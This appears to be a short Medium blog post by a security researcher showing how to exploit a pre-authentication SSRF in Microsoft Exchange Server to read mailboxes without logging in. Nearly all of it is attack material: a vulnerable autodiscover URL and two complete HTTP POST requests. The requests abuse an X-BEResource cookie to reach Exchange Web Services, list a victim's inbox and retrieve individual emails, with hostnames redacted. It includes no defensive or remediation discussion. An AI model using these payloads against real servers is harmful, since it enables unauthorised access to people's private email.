Pre-Auth SSRF To Full MailBox Access (Microsoft Exchange Server Exploit)

Exploitation:

On reading the blogs i figured that Pre-Auth SSRF can be triggered by
Vuln URL: (Here the application will send the internal request to “/mapi/nspi”)

 https://autodiscover.redacted.com/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
/powershell
/mapi/emsmdb
/autodiscover/autodiscover.xml
/ews/exchange.asmx
/owa/auth/Current/
/ecp/default.flt
/ecp/favicon.ico
POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1128
<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope
xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
</soap:Header>
<soap:Body>
<m:FindItem Traversal='Shallow'>
<m:ItemShape>
<t:BaseShape>AllProperties</t:BaseShape>
</m:ItemShape>
<m:ParentFolderIds>
<t:DistinguishedFolderId Id='inbox'>
<t:Mailbox>
<t:EmailAddress>info@redacted.com</t:EmailAddress>
</t:Mailbox>
</t:DistinguishedFolderId>
</m:ParentFolderIds>
</m:FindItem>
</soap:Body>
</soap:Envelope>
Payload used to retrieve individual emails without authentication.
POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1062
<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope
xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
</soap:Header>
<soap:Body>
<m:GetItem Traversal='Shallow'>
<m:ItemShape>
<t:BaseShape>AllProperties</t:BaseShape>
</m:ItemShape>
<m:ItemIds>
<t:ItemId Id="ItemID" ChangeKey="Changekey" />
</m:ItemIds>
</m:GetItem>
</soap:Body>
</soap:Envelope>

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Vanshal Gaur

Vanshal Gaur

18 Y/o | OSCP | OSWE | Security Researcher | Twitter: VanshalG